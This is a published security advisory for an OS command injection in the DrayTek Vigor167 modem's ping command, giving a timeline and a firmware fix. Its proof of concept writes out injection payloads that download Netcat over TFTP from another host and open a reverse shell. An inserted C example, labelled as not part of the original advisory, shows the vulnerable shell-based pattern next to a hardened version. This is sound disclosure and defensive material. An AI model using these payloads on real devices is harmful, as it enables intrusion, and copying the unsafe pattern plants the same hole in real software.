-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2023-023
Product:                   Vigor167
Manufacturer:              DrayTek
Affected Version(s):       5.2.2
Tested Version(s):         5.2.2
Vulnerability Type:        OS Command Injection (CWE-78)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2023-09-22
Solution Date:             2023-11-16
Public Disclosure:         2023-12-06
CVE Reference:             CVE-2023-47254
Author of Advisory:        Luna Krone, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Vigor167 is a VDSL2 35b Supervectoring Modem.

The manufacturer describes the product as follows (see [1]):

"Vigor167 is a VDSL2 35b modem/router."

Due to missing input validation, the command-line interface of the device
is vulnerable to an OS command injection.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Vigor167 has a command-line interface available via both Telnet and SSH.
This interface requires a login with any account available in the web
interface. This also includes accounts which were denied every access
according to their group settings. Afterward, a limited set of commands
is available to the user.

The ping command present allows injecting commands which are then
executed on the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Commands can be injected with backticks (``). The current working
directory can be printed out with the following command:

vigor> exec ping `pwd`
ping: /tmp: Unknown host

Another possibility is to wrap the OS command in parentheses following a
dollar sign like $(pwd).

The available commands are very limited. For example, only a small
fraction of the standard output from the injected commands is displayed.
Furthermore, space characters lead to evaluation errors. In order to
achieve a full reverse shell, some of BusyBox's internal commands can be
used.
In preparation, a TFTP server is hosted on a computer which is reachable
by Vigor167 over the network. A statically compiled version of Netcat [2]
is hosted on the TFTP server. First, the operating system of Vigor167 is
instructed to download the file:

vigor> exec ping `busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5`
BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary

usage: ping [OPTION]... host

${IFS} is a POSIX variable that contains the field separator and serves
as a replacement for the space character.

Then, the executable flag is set on the transferred Netcat binary:

vigor> exec ping `chmod${IFS}+x${IFS}/tmp/netcat`
BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary

usage: ping [OPTION]... host

On the computer hosting the TFTP server, a Netcat listener is opened.
Then, a reverse shell can be spawned:

vigor> exec ping `/tmp/netcat${IFS}192.168.100.5${IFS}9001${IFS}-e${IFS}ash`

The reverse shell is opened to the targeted host:

Connection from 192.168.100.1:43354
sh: turning off NDELAY mode
pwd
/tmp

Vigor167 was used in modem mode.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update the modem's firmware to version 5.2.3.
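The root cause described above is a host argument that reaches a shell unfiltered, so `...`, $(...) and ${IFS} are interpreted before ping ever runs. The following C code is an added, defender-side illustration of that pattern and of its fix; it is not DrayTek's firmware code and not part of the SySS advisory. The function names (host_arg_is_safe, ping_unsafe, ping_safe) and the ping options are assumptions chosen for the example. The hardened variant allowlists the characters of a hostname or IP address and then executes ping through an argv array without a shell, so shell metacharacters in the argument carry no meaning even if the allowlist were relaxed.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist check for a ping target (assumed helper, not vendor code):
 * letters, digits, '.', '-' and ':' (for IPv6 literals) only, at most
 * 253 characters, and no leading '-' so the value cannot be read as an
 * option by ping. Returns 1 if the argument is acceptable, 0 otherwise. */
int host_arg_is_safe(const char *host) {
    size_t n = strlen(host);
    if (n == 0 || n > 253 || host[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':'))
            return 0;
    }
    return 1;
}

/* Vulnerable pattern (CWE-78), illustrative only: the user-supplied host
 * is spliced into a command line that a shell parses, so `pwd`, $(pwd)
 * and ${IFS} are expanded before ping starts. Never use this shape. */
int ping_unsafe(const char *host) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "ping -c 1 %s", host);
    return system(cmd);
}

/* Hardened variant: reject anything outside the allowlist, then run ping
 * via fork/execvp with a fixed argv array. No shell is involved, so the
 * argument is passed to ping as a single opaque string. Returns ping's
 * exit status, or -1 if the argument was rejected or exec failed. */
int ping_safe(const char *host) {
    if (!host_arg_is_safe(host))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = {"ping", "-c", "1", (char *)host, NULL};
        execvp("ping", argv);
        _exit(127);               /* only reached if exec itself fails */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv) {
    const char *target = argc > 1 ? argv[1] : "`pwd`";  /* constructed sample */
    int rc = ping_safe(target);
    printf("ping_safe(\"%s\") -> %d\n", target, rc);
    return 0;
}
```

Run with a plain address to see ping execute, and with an argument such as `$(pwd)` or the ${IFS} form from the PoC to see it rejected before any process is spawned. The allowlist is the first line of defence; the argv-based exec is the one that removes the shell from the path entirely.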
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-07-30: Vulnerability discovered
2023-09-22: Vulnerability reported to manufacturer
2023-11-16: Patch released by manufacturer
2023-12-06: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Vigor167
    https://www.draytek.com/products/vigor167
[2] Statically compiled MIPS32 Netcat
    https://github.com/darkerego/mips-binaries/blob/master/netcat
[3] SySS Security Advisory SYSS-2023-023
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-023.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Luna Krone of SySS GmbH.

E-Mail: luna.krone@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Luna_Krone.asc
Key ID: 0x31764595D77A53F2
Key Fingerprint: C7AF 1259 B763 D588 E8D2 B302 3176 4595 D77A 53F2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEx68SWbdj1Yjo0rMCMXZFldd6U/IFAmeXkmkACgkQMXZFldd6
U/LqKg//e1kzeuqn/Q/CaXFHT9lOQmtoi+Q7UIZBNyvKkqaKJZi75QELXZwuhiGC
t2WjAwDIVBJhdV2lbJVfswZOHMRPPmserPrhqMqOqD20ATlLiGbNSTI5zeZjZVVU
cIa9QSPgaX+bPK94cJmHXXlzPmqsZu1ElReMnGhi0T22Jte8EzkQk4KRe8W8VCUN
KA6XoM7oKUCkKxSyKWIB3hqqQf53Elm9jo7DfuttR6/loH/oG3yZL/uLpgXMTV+m
K1qSrXSCueNPkeY3HbiTqoo2qXodlyTrgeK4zv5HRQsvW2ee0ggvOnABD8bDkMLB
7C2GSO2VPunfjtDDVoj4SxSwo4ad/BFjF99D93D3dB8KpB3A89NeAmnEJiWZzx15
d11Gbdz6GKMTZ/KPY0X0g8ADDxuofqVUhloX+2oEFa37WmkVtPzKyP8timuBtZSX
GGpy2zvhkcfnd2D+rJHK/uiXUOBsyXQ6lM5Fh00pRPH/0F9siTKJfpHsxZT0d39t
mWycqHTVEUe0S4ICIx6CZukeatPHOrZDmgrWKtLklKwGXmZ10aogCQ0R1WgUYkcn
JtxRZkYbnNidgfVW9TBmxUNJYr/griHEzwu2KYgXhOYjqquESqXBBM3OVDL/qVqF
3SMnr1sBMUBv1058K7IDH1aS8+BArzZ/XbEqyq51MktsOOj+cAc=
=4v8Q
-----END PGP SIGNATURE-----